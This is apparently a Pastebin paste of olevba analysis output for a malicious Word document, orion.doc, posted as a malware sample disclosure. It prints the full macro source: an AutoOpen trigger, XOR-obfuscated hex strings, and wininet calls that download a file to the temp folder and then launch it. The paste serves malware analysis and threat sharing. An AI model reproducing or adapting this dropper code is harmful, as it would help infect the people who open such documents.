API tools faq
paste
Advertisement
dynamoo

Malicious Word macro

dynamoo
Apr 8th, 2015
558
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 12.10 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- orion.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: orion.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: orion.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub InIn()
  17. CALTHA
  18. End Sub
  19.  
  20. Sub autoopen()
  21. InIn
  22. End Sub
  23.  
  24. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  25. ANALYSIS:
  26. +----------+----------+---------------------------------------+
  27. | Type     | Keyword  | Description                           |
  28. +----------+----------+---------------------------------------+
  29. | AutoExec | AutoOpen | Runs when the Word document is opened |
  30. +----------+----------+---------------------------------------+
  31. -------------------------------------------------------------------------------
  32. VBA MACRO FILE6.bas
  33. in file: orion.doc - OLE stream: u'Macros/VBA/FILE6'
  34. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  35.  
  36. Option Explicit
  37. Public Const C1C1C1A = "BRITTANY"
  38.  
  39. #If VBA7 And Win64 Then
  40. Public _
  41. Declare _
  42. PtrSafe _
  43. Function _
  44. C1C1C1 Lib _
  45. "wininet.dll" Alias "InternetCloseHandle" (ByRef C26C26C26 As LongPtr) As Long
  46. Public _
  47. Declare _
  48. PtrSafe _
  49. Function _
  50. C2C2C2 Lib _
  51. "wininet.dll" Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As LongPtr
  52. Public _
  53. Declare _
  54. PtrSafe _
  55. Function _
  56. C3C3C3 Lib _
  57. "wininet.dll" Alias "InternetReadFile" (ByVal C32C32C32 As LongPtr, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
  58. Public _
  59. Declare _
  60. PtrSafe _
  61. Function _
  62. C4C4C4 Lib _
  63. "wininet.dll" Alias "InternetOpenUrlA" (ByVal C36C36C36 As LongPtr, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As LongPtr
  64. #Else
  65. Public Declare Function C1C1C1 Lib "wininet.dll" _
  66. Alias "InternetCloseHandle" (ByRef C26C26C26 As Long) As Long
  67. Public Declare Function C2C2C2 Lib "wininet.dll" _
  68. Alias "InternetOpenA" (ByVal C27C27C27 As String, ByVal C28C28C28 As Long, ByVal C29C29C29 As String, ByVal C30C30C30 As String, ByVal C31C31C31 As Long) As Long
  69. Public Declare Function C3C3C3 Lib "wininet.dll" _
  70. Alias "InternetReadFile" (ByVal C32C32C32 As Long, ByVal C33C33C33 As String, ByVal C34C34C34 As Long, C35C35C35 As Long) As Integer
  71. Public Declare Function C4C4C4 Lib "wininet.dll" _
  72. Alias "InternetOpenUrlA" (ByVal C36C36C36 As Long, ByVal C37C37C37 As String, ByVal C38C38C38 As String, ByVal C39C39C39 As Long, ByVal C40C40C40 As Long, ByVal C41C41C41 As Long) As Long
  73. #End If
  74.  
  75.  
  76.  
  77. Private Const BRANDI = 8162
  78. Private Const BRANDY As String = "HAZ"
  79. Private Const BREANA = 1
  80. Private Const BREDA = &H4000000
  81.  
  82. Public Function C16C16C16 _
  83. (ByVal BREE As String) As Boolean
  84.     #If VBA7 _
  85.     And Win64 Then
  86.         Dim BRETT As LongPtr, BRIANNA As LongPtr
  87.     #Else
  88.         Dim BRETT As Long, BRIANNA As Long
  89.     #End If
  90.     Dim BRIAR As Long
  91.     Dim C33C33C33 As String * BRANDI, BRIELLE As String
  92.     Dim BRIER As Integer, BRIONY As Double
  93.     BRETT = C2C2C2(BRANDY, BREANA, vbNullString, vbNullString, 0)
  94.     If BRETT = 0 Then
  95.         Exit Function
  96.     End If
  97.     Dim FiGaMan As Boolean
  98.    
  99.     If BRITANNIA(BRIANNA, BRETT) Then
  100.     End If
  101.     If BRIANNA = 0 Then
  102.         BRIONY = 0
  103.     Else
  104.         C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR
  105.         BRIELLE = C33C33C33
  106.         Do While BRIAR <> 0
  107.             C3C3C3 BRIANNA, C33C33C33, BRANDI, BRIAR
  108.            
  109.             Dim BRITT As Long
  110. For BRITT = 6 To 8
  111. If BRITT = 38 Then End
  112. Next BRITT
  113.            
  114.             BRIELLE = BRIELLE + Mid(C33C33C33, 1, BRIAR)
  115.         Loop
  116.             BRIONY = Len(BRIELLE): BRIER = FreeFile
  117.         Open BREE _
  118.             For Binary Access Write _
  119.         Lock Write _
  120.         As #BRIER
  121.         Put #BRIER, _
  122.                 , BRIELLE
  123.         Dim BRITTA As Double
  124.             For BRITTA = 2 To 3
  125.     If BRITTA = 37 Then End
  126. Next BRITTA
  127.         Close #BRIER
  128.     End If
  129.     C1C1C1 BRIANNA
  130.     C1C1C1 BRETT
  131.     BRIELLE = ""
  132.     If BRIONY Then
  133.         C16C16C16 = True
  134.     End If
  135. End Function
  136.  
  137.  
  138. Public Function CANDICE(CANDIDA As String) As Integer
  139. CANDICE = Len(CANDIDA)
  140. End Function
  141.  
  142. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  143. ANALYSIS:
  144. +------------+----------------+-----------------------------------------+
  145. | Type       | Keyword        | Description                             |
  146. +------------+----------------+-----------------------------------------+
  147. | Suspicious | Lib            | May run code from a DLL                 |
  148. | Suspicious | Open           | May open a file                         |
  149. | Suspicious | Write          | May write to a file (if combined with   |
  150. |            |                | Open)                                   |
  151. | Suspicious | Put            | May write to a file (if combined with   |
  152. |            |                | Open)                                   |
  153. | Suspicious | Binary         | May read or write a binary file (if     |
  154. |            |                | combined with Open)                     |
  155. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  156. |            |                | be used to obfuscate strings (option    |
  157. |            |                | --decode to see all)                    |
  158. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  159. |            |                | may be used to obfuscate strings        |
  160. |            |                | (option --decode to see all)            |
  161. | IOC        | wininet.dll    | Executable file name                    |
  162. +------------+----------------+-----------------------------------------+
  163. -------------------------------------------------------------------------------
  164. VBA MACRO PIDLE0.bas
  165. in file: orion.doc - OLE stream: u'Macros/VBA/PIDLE0'
  166. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  167.  
  168.  
  169.  
  170. Public Function C8C8C8(CAMERON As String, CAMILLA As String) As String
  171.    
  172.     Dim CAMILLE As Integer
  173.     Dim CAMMIE As Integer
  174.    
  175.    
  176.     Dim CAMRYN As Double
  177. For CAMRYN = 1 To 3
  178. If CAMRYN = 32 Then End
  179. Next CAMRYN
  180.    
  181.     Dim CANDACE As Long
  182.     Dim CANDI As String
  183.     For CANDACE = 1 _
  184.     To _
  185.     ( _
  186.     CANDICE _
  187.     (CAMILLA) _
  188.     / 2)
  189.         CAMILLE = Val("&H" & _
  190.         (Mid$(CAMILLA, _
  191.         (2 * CANDACE) - 1, 2)))
  192.         CAMMIE = Asc(Mid$(CAMERON, _
  193.         ((CANDACE Mod Len(CAMERON)) + 1), 1))
  194.         CANDI = CANDI + Chr(CAMILLE Xor CAMMIE)
  195.     Next CANDACE
  196.    C8C8C8 = CANDI
  197. End Function
  198.  
  199.  
  200.  
  201. Public Function C21C21C21() As Object
  202. Dim C22C22C22 As String
  203. C22C22C22 = C8C8C8(C9C9C9, C10C10C10)
  204. Set C21C21C21 = CreateObject(C22C22C22)
  205. End Function
  206.  
  207.  
  208. Sub CALTHA()
  209.         Dim CAMELLIA As Long
  210.  
  211.     Dim CANDIS As Double
  212. For CANDIS = 44 To 46
  213. If CANDIS = 32 Then End
  214. Next CANDIS
  215. CAMELLIA = 89
  216. CALANTHA (CAMELLIA)
  217.  
  218. End Sub
  219. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  220. ANALYSIS:
  221. +------------+--------------+-----------------------------------------+
  222. | Type       | Keyword      | Description                             |
  223. +------------+--------------+-----------------------------------------+
  224. | Suspicious | CreateObject | May create an OLE object                |
  225. | Suspicious | Chr          | May attempt to obfuscate specific       |
  226. |            |              | strings                                 |
  227. | Suspicious | Xor          | May attempt to obfuscate specific       |
  228. |            |              | strings                                 |
  229. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  230. |            |              | be used to obfuscate strings (option    |
  231. |            |              | --decode to see all)                    |
  232. +------------+--------------+-----------------------------------------+
  233. -------------------------------------------------------------------------------
  234. VBA MACRO IDL4.bas
  235. in file: orion.doc - OLE stream: u'Macros/VBA/IDL4'
  236. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  237.  
  238.  
  239. Public Const C18C18C18 = "675B26585F6D754333585A2055472A5B5D"
  240. Public Const C19C19C19 = "6850770C1D264C56"
  241. Public Const C20C20C20 = "5C473744096C1B553947456D50566C05026C0403771A563B51"
  242. Public Const C10C10C10 = "6750315D43375D5D241A752A5856104D4037515E0C5659265747"
  243. Public Const C9C9C9 = "C43C43C43C43C43C43C43C43C43C43"
  244.  
  245.  
  246. Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
  247. If CAILEIGH.FileExists(CAILYN) Then
  248. CADY = True
  249. Else
  250. CADY = False
  251. End If
  252. End Function
  253. #If VBA7 _
  254.     And Win64 Then
  255.        Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
  256.     #Else
  257.        Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean
  258.     #End If
  259. Dim CALLIDORA As String
  260.     CALLIDORA = C8C8C8(C9C9C9, C20C20C20)
  261.    
  262.                 CALIDA _
  263.     = C4C4C4 _
  264.     ( _
  265.     CALLA, _
  266.     CALLIDORA, vbNullString, _
  267.     0, _
  268.     BREDA, 0)
  269.     BRITANNIA = True
  270. End Function
  271.  
  272.  
  273. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  274. ANALYSIS:
  275. +------------+-------------+-----------------------------------------+
  276. | Type       | Keyword     | Description                             |
  277. +------------+-------------+-----------------------------------------+
  278. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  279. |            |             | be used to obfuscate strings (option    |
  280. |            |             | --decode to see all)                    |
  281. +------------+-------------+-----------------------------------------+
  282. -------------------------------------------------------------------------------
  283. VBA MACRO M.bas
  284. in file: orion.doc - OLE stream: u'Macros/VBA/M'
  285. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  286.  
  287.  
  288. Public Function C5C5C5(ByRef C23C23C23 As Object) As Object
  289. Set C5C5C5 = C23C23C23.GetSpecialFolder(2)
  290. End Function
  291. Sub CALANTHA(CALEIGH As Long)
  292.  
  293. C25C25C25 ("CACACARDRDRDRD")
  294. End Sub
  295.  
  296.  
  297. Public Function C25C25C25(C24C24C24 As String)
  298. C6C6C6
  299. End Function
  300.  
  301. Public Function C6C6C6()
  302.  
  303. Dim C7C7C7  As Object
  304. Set C7C7C7 = C21C21C21
  305. Dim C11C11C11 As Object
  306. Set C11C11C11 = C5C5C5(C7C7C7)
  307.  
  308. Dim C15C15C15
  309. Dim C12C12C12
  310. C12C12C12 = C8C8C8(C9C9C9, C19C19C19)
  311. C15C15C15 = C11C11C11 & C12C12C12
  312.  
  313.  
  314. If CADY(C7C7C7, C15C15C15) Then
  315. C7C7C7. _
  316. DeleteFile C15C15C15
  317. End If
  318. If C16C16C16(C15C15C15) Then
  319. End If
  320. If CADY(C7C7C7, C15C15C15) Then
  321. End If
  322. Dim C17C17C17
  323. Set C17C17C17 = CreateObject _
  324. (C8C8C8 _
  325. (C9C9C9, C18C18C18))
  326. C17C17C17.Open C15C15C15
  327. End Function
  328.  
  329.  
  330. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  331. ANALYSIS:
  332. +------------+--------------+-----------------------------------------+
  333. | Type       | Keyword      | Description                             |
  334. +------------+--------------+-----------------------------------------+
  335. | Suspicious | CreateObject | May create an OLE object                |
  336. | Suspicious | Open         | May open a file                         |
  337. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  338. |            |              | be used to obfuscate strings (option    |
  339. |            |              | --decode to see all)                    |
  340. +------------+--------------+-----------------------------------------+
  341. -------------------------------------------------------------------------------
  342. VBA MACRO UserForm1.frm
  343. in file: orion.doc - OLE stream: u'Macros/VBA/UserForm1'
  344. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  345. (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!